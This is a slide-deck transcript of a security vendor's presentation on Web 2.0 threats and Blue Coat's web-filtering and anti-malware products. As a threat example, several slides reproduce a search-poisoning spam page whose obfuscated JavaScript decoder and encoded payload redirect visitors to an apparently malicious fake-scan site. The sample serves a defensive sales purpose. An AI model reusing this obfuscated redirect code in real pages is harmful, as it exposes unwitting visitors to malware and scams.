440 likes | 567 Views
Living in a Web 2.0 World (and how BCSI can help!). Mark Stanford SE Manager. 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net. Agenda. Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples
E N D
Living in a Web 2.0World(and howBCSI canhelp!) Mark Stanford SE Manager 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net
Agenda • Definition of Web 2.0 • Overview • Real World Web 2.0 application and threat examples • BCSI countermeasures: Layered Security Defenses
What is Web 2.0? Applications & Services Technologies & Programming Languages Software & Systems
Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have
Cyber Crime Evolution Wide-spread, Fast Targeted Visible, DoS Invisible Damage/Defacement Data Collection/Identity Ingenuity/Pride Driven Profit Driven Amateurs Professionals
Web 2.0 • Did NOT change… the OSI model the way IP addresses work the way URLs are handled the way Web Filtering works • DID change… how information gets posted, even legitimate sites how information may be presented By 2012 the Internet will be 75X larger than in 2002 What is required to find/identify threats on the web
Web 2.0 Also Means 1 URL Leads to Many 12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time) 12 Domains, 246 URLs(www.bild.de, 31.03.2010, 10:17 a.m. German Time)
Forums Blogs Wikis Guestbooks Web 2.0 and Search Engines www Search Engine View
WebPulse WebPulse saw a new referrer…
Nothing here… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45 <strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font color=#41FE63 style="font-size: 12px;">linksys 54g install</font>
<script language="javascript"> function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));} </script> Interesting… <html><head><title>Install Keys Satellite</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta http-equiv="Content-Language" content="en-us" /> <meta name="robots" content="index, follow" /> </head><body bgcolor=#59746> <script language="javascript"> document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1'); </script> <style> body { font-family: verdana; margin: 10px 100px; } </style> <h3>Install Keys Satellite</h3> <strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: <script> document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169"; </script>
Web 2.0 Examples - Twitter • Still a toy or already a tool?
Web 2.0 Examples - Facebook • Still a toy or already a tool?
Koobface worm (January 2009) • Invitation to click on a link in Facebook or Myspace in-box • Supposedly link to a funny video • Users where told that they have to update their flash player to view the video • The installed SW was a proxy server • Now selected traffic could be redirected to the attacker • A second program to download and install arbitrary code was installed, too Like magic, the infected computer is now a zombie, under the control of unknown villains
Changing Web Habits • Top 10 Categories – 2009 • WebFilter/WebPulse, 62M+ Users • 1. Social Networking • 2. Web Advertisements • 3. Search Engines/Portals • 4. Personals/Dating • 5. Pornography • 6. Computers/Internet • 7. Audio/Video Clips • 8. Adult/Mature Content • 9. Web Email • 10. Illegal/Questionable Social Networking Moved to #1 from #2 position Represents 25% of Top10 requests Web Email Dropped to #9 from #5 position Users migrating to social networking Cyber Crime Leverages Search engine poisoning Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams
Hybrid Design WebFilter ProxySG & ProxyAV Architected to Deliver On-Demand Security Intelligence URL Filtering & Reporting Cloud threat protection Cloud Defenses Real-time web content ratings Web threat & malware detection Reputation ratings ProxyClient Remote Users Web Gateway Protection Inline threat analysis w/SSL Web filtering & content controls Media optimization + B/W Mgmt WebPulse Reporter WAN Web Industry’s leading collaborative cloud defense with 62M users Real-time inputs of any new web content and dynamic links Web protection, visibility, and reporting in any location
WebPulse Malware Scanning Data Types Protocol Compliance Content Filters Active Content URL Filtering AAA Policy Method Controls Certificate Validation BCWF Log Files Reporter Blue Coat Secure Web Gateway Object Cache • ProxyAV: • Behavior based analysis • Signatures Bandwidth Management Protocol Optimization
BCWF Malware Identification StrategyDynamic Link Analysis • Popular Web Site Pointers • Middle Relay Servers & Link Farms • Malware Download Hosts A C B Preserve Productivity
Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL chain for threats & rating • Update master database in cloud to protect all members Cloud Community
Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community
Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community
Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of URL for threats & rating • Update master database in cloud to protect all members Cloud Community
Dynamic Link Analysis • Cloud connected community that is broad and diverse • Real-time input of new web links to the cloud service • Immediate analysis of full link chain for threats & rating • Update master database in cloud to protect all members Cloud Community Protects Web Gateways Remote Users
WebPulse: First Complete DLA solution • New defense layer • Full Dynamic link analysis • Foundation for next generation URL filtering • Fast, Aware, Protective… for anyone, anywhere Cloud Community Protects WebPulse 62M Users ProxySG 2B reqs/week WebFilter Web Gateways ProxyClient K9 Remote Users
Deep Background Rating Analysis (DBRA) • 2 Secs – 2hrs • RTT Balanced URL & Content Trainers URL Malware Real Time Boundary WebPulse Cloud Service ANZ Threat Analysis • 16 Sources • Signatures • Behavior • Heuristics • Reputation • Sandboxing Master Rating Database • Rating Servers • 300M Unique requests daily • 1.2B requests “rated” weekly • 50 languages • Fast (ms) – try it! VA HK UK CA WebPulse Clients Dynamic URL Cache BCWF Full List Dynamic URL Cache Dynamic URL Cache • “Uncategorized” sent to WebPulse for • Dynamic categorization • 62M+ User Community • 45B+ requests/week • Fully Configurable and Secure • 5 Min for security updates BCWF Full List ProxyAV ProxySG ProxyClient K-9 Web Protect
Dual Cache Design Clean Object Cache Finger Print Cache ProxyAV: Co-Processor Architecture • Improved utilization with M:N ratio • Higher throughput per gateway • Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible) • Optimized design ProxyAV ICAP, ICAP+, S-ICAP Internet Enterprise Network • Patience Page • Trickle First • Trickle Last • Defer Scan (media) ProxySG
ProxyAV – anti-malware features • Don’t get confused by the name “AV” • Anti-malware features are more comprehensive then traditional pattern matching technologies Behavioral analysis Sandboxing Heuristics True file type detection Etc. • ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249) Note: Finjan was not able to block the exploit without a security update It is a different approach and philosophy
ProxyClient included with WebFilter • Remote Filtering • Cloud Connected • Threat Protection • Acceleration • Central Policy • Reporting
Why Blue Coat Products? • Unmatched policy controls & authentication options • Proactive Malware/MMC detection • Real-time web content analysis/DLA for gateway & client • URL database, threat detection, and DLP partners • Custom object-based OS with patented cache technologies • Broad proxy library & acceleration techniques • Bandwidth management & protocol optimization/compliance • Experience, Reliability, Performance All the RIGHT parts! Blue Coat Confidential Information